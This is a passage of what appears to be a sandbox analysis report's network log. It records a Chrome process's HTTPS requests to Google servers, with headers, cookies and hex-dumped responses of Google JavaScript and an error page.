                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-xtPwsFjMZhYCxACdq41FYA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:23 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          63192.168.2.749824142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC1143OUTGET /xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=0/dg=0/br=1/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA/m=aLUfP?xjs=s4 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC816INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1521
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:24 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 14:41:24 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 27 Sep 2024 04:59:45 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC574INData Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 77 28 22 61 4c 55 66 50 22 29 3b 0a 76 61 72 20 44 71 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 53 70 3d 61 7d 3b 76 61 72 20 45 71 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 42 6e 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 76 61 72 20 62 3d 74 68 69 73 3b 74 68 69 73 2e 77 69 6e 64 6f 77 3d 61 2e 73 65 72 76 69 63 65 2e 77 69 6e 64 6f 77 2e 67 65 74 28 29 3b 74 68 69 73 2e 74 61 3d 74 68 69 73 2e 53 70 28 29 3b 74 68 69 73 2e 6f 61 3d 77 69 6e 64 6f 77 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 3b 74 68 69 73 2e 6b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61
                                                                                                                                                                                                                                                                                          Data Ascii: this._hd=this._hd||{};(function(_){var window=this;try{_.w("aLUfP");var Dqb=function(a){this.Sp=a};var Eqb=function(a){_.Bn.call(this,a.Ma);var b=this;this.window=a.service.window.get();this.ta=this.Sp();this.oa=window.orientation;this.ka=function(){va
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC450INData Raw: 69 73 2e 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 22 2c 0a 74 68 69 73 2e 6b 61 29 7d 3b 5f 2e 43 28 45 71 62 2c 5f 2e 42 6e 29 3b 45 71 62 2e 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 73 65 72 76 69 63 65 3a 7b 77 69 6e 64 6f 77 3a 5f 2e 45 6e 7d 7d 7d 3b 5f 2e 6d 3d 45 71 62 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 61 64 64 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4e 64 2e 61 64 64 28 61 29 7d 3b 5f 2e 6d 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4e 64 2e 64 65 6c 65 74 65 28 61 29 7d 3b 0a 5f 2e 6d 2e 53 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28
                                                                                                                                                                                                                                                                                          Data Ascii: is.window.addEventListener("orientationchange",this.ka)};_.C(Eqb,_.Bn);Eqb.Ga=function(){return{service:{window:_.En}}};_.m=Eqb.prototype;_.m.addListener=function(a){this.Nd.add(a)};_.m.removeListener=function(a){this.Nd.delete(a)};_.m.Sp=function(){if(
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC497INData Raw: 28 29 26 26 5f 2e 6c 61 28 29 26 26 21 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 63 6c 75 64 65 73 28 22 47 53 41 22 29 3a 74 68 69 73 2e 77 69 6e 64 6f 77 2e 76 69 73 75 61 6c 56 69 65 77 70 6f 72 74 29 3f 5f 2e 6f 6c 28 74 68 69 73 2e 77 69 6e 64 6f 77 29 3a 6e 65 77 20 5f 2e 64 6c 28 74 68 69 73 2e 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2c 74 68 69 73 2e 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 29 3b 72 65 74 75 72 6e 20 61 2e 68 65 69 67 68 74 3c 61 2e 77 69 64 74 68 7d 3b 0a 5f 2e 6d 2e 64 65 73 74 72 6f 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 74 68 69 73 2e 6b 61 29 3b 74 68 69 73
                                                                                                                                                                                                                                                                                          Data Ascii: ()&&_.la()&&!navigator.userAgent.includes("GSA"):this.window.visualViewport)?_.ol(this.window):new _.dl(this.window.innerWidth,this.window.innerHeight);return a.height<a.width};_.m.destroy=function(){this.window.removeEventListener("resize",this.ka);this


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          64192.168.2.749826142.250.181.2384435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC778OUTGET /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC270INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:24 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                          Content-Length: 1555
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC1120INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC435INData Raw: 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e
                                                                                                                                                                                                                                                                                          Data Ascii: pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          65192.168.2.749827142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC1438OUTGET /gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=CsT2Zo-iIaySxc8Pn72EmA8&zx=1727448082905&opi=89978449 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC715INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-zacoJkhx8pMV0uWasglBLQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:24 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          66192.168.2.749828142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC1156OUTGET /xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=0/dg=0/br=1/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC816INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1667
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:24 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 14:41:24 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 27 Sep 2024 04:59:45 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC574INData Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 77 28 22 6c 4f 4f 30 56 64 22 29 3b 0a 5f 2e 59 61 62 3d 6e 65 77 20 5f 2e 4e 64 28 5f 2e 6d 4c 61 29 3b 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 76 61 72 20 69 62 62 3b 5f 2e 6a 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 74 68 69 73 2e 4e 45 61 3d 61 3b 74 68 69 73 2e 50 6c 64 3d 62 3b 74 68 69 73 2e 70 6c 62 3d 63 3b 74 68 69 73 2e 4f 72 64 3d 64 3b 74 68 69 73 2e 72 45 64 3d 65 3b 74 68 69 73 2e 6a 63 62 3d 30 3b 74 68 69 73 2e 6f 6c 62 3d 69 62 62 28 74 68 69 73
                                                                                                                                                                                                                                                                                          Data Ascii: this._hd=this._hd||{};(function(_){var window=this;try{_.w("lOO0Vd");_.Yab=new _.Nd(_.mLa);_.y();}catch(e){_._DumpException(e)}try{var ibb;_.jbb=function(a,b,c,d,e){this.NEa=a;this.Pld=b;this.plb=c;this.Ord=d;this.rEd=e;this.jcb=0;this.olb=ibb(this
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC450INData Raw: 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 50 36 73 51 4f 63 22 29 3b 0a 76 61 72 20 6c 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 7b 7d 3b 5f 2e 46 61 28 61 2e 71 73 62 28 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 62 5b 65 5d 3d 21 30 7d 29 3b 76 61 72 20 63 3d 61 2e 6d 72 62 28 29 2c 64 3d 61 2e 41 72 62 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 6a 62 62 28 61 2e 7a 72 62 28 29 2c 63 2e 6b 61 28 29 2a 31 45 33 2c 61 2e 6d 69 62 28 29 2c 64 2e 6b 61 28 29 2a 31 45 33 2c 62 29 7d 2c 6d 62 62 3d 21 21 28 5f 2e 4b 67 5b 33 30 5d 26 31 29 3b 76 61 72 20 6e 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 42 6e 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 74 68 69 73 2e 6c 6f 67 67 65 72 3d 6e 75 6c 6c 3b 74
                                                                                                                                                                                                                                                                                          Data Ascii: ption(e)}try{_.w("P6sQOc");var lbb=function(a){var b={};_.Fa(a.qsb(),function(e){b[e]=!0});var c=a.mrb(),d=a.Arb();return new _.jbb(a.zrb(),c.ka()*1E3,a.mib(),d.ka()*1E3,b)},mbb=!!(_.Kg[30]&1);var nbb=function(a){_.Bn.call(this,a.Ma);this.logger=null;t
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:24 UTC643INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 74 68 69 73 2e 74 61 2e 67 65 74 54 79 70 65 28 61 2e 4e 6b 28 29 29 21 3d 3d 31 29 72 65 74 75 72 6e 20 5f 2e 43 61 62 28 61 29 3b 76 61 72 20 63 3d 74 68 69 73 2e 6b 61 2e 70 6f 6c 69 63 79 3b 28 63 3d 63 3f 6c 62 62 28 63 29 3a 6e 75 6c 6c 29 26 26 63 2e 54 6a 61 28 29 3f 28 62 3d 6f 62 62 28 74 68 69 73 2c 61 2c 62 2c 63 29 2c 61 3d 6e 65 77 20 5f 2e 79 61 62 28 61 2c 62 2c 32 29 29 3a 61 3d 5f 2e 43 61 62 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 76 61 72 20 6f 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 63 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 6d 62 62 29 69 66 28 65
                                                                                                                                                                                                                                                                                          Data Ascii: function(a,b){if(this.ta.getType(a.Nk())!==1)return _.Cab(a);var c=this.ka.policy;(c=c?lbb(c):null)&&c.Tja()?(b=obb(this,a,b,c),a=new _.yab(a,b,2)):a=_.Cab(a);return a};var obb=function(a,b,c,d){return c.then(function(e){return e},function(e){if(mbb)if(e


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          67192.168.2.749829142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
